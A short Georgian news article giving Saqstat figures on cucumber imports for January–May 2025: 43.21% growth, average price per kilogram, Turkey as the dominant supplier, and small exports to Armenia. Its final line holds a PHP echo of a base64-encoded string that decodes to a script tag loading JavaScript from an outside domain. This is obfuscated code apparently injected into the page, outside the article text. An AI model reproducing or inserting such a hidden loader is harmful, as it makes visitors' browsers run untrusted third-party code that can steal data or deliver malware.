global distribution
გარე ავეჯი

2025 წლის იანვარ-მაისში, საქართველოში კიტრის იმპორტი 43.21%-ით გაიზარდა. ამის შესახებ „საქსტატის“ მონაცემებიდან ვიგებთ.

კერძოდ, წლევანდელ 5 თვეში ქვეყანამ შეიძინა 10 249 ტონა კიტრი, რომლის საერთო ღირებულებამ 6.968 მლნ აშშ დოლარი შეადგინა. შედარებისთვის, გასულ წელს, 4.865 მლნ აშშ დოლარის ღირებულების, 9 794 ტონა კიტრი ვიყიდეთ.
როგორც მონაცემებიდან ირკვევა, წელს შეძენილ კილოგრამ კიტრში საშუალოდ 0.68 აშშ დოლარი (გადასახადების გარეშე) გადავიხადეთ, რაც გასული წლის ფასზე 0.18 აშშ დოლარით მეტია.
 

აღსანიშნავია, რომ ქვეყანა კიტრის 91.94%-ს თურქეთში ყიდულობს, სიაში ასევე არიან ირანი, აზერბაიჯანი, სომხეთი და ნიდერლანდები.

კიტრის იმპორტიორი ქვეყნები საქართველოში 2025 წლის იანვარ-მაისში:

თურქეთი - 6.406 მლნ აშშ დოლარი (9 125 ტონა);
ირანი - 518 600 აშშ დოლარი (1 046 ტონა);
სომხეთი - 31 000 აშშ დოლარი (64.5 ტონა);
აზერბაიჯანი - 10 200 აშშ დოლარი (12.2 ტონა);
ნიდერლანდები - 1 600 აშშ დოლარი (0.9 ტონა).


რაც შეეხება ადგილობრივ ექსპორტს, 2025 წლის იანვარ-მაისში საქართველომ 62 900 აშშ დოლარის კიტრი გაყიდა, რაც წლიურად 63.8%-იანი ზრდაა.

პირველ 5 თვეში გაყიდული კიტრის სრული ოდენობა გავიტანეთ სომხეთში - 62 900 აშშ დოლარის ღირებულების 79.9 ტონა კიტრი.

185
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");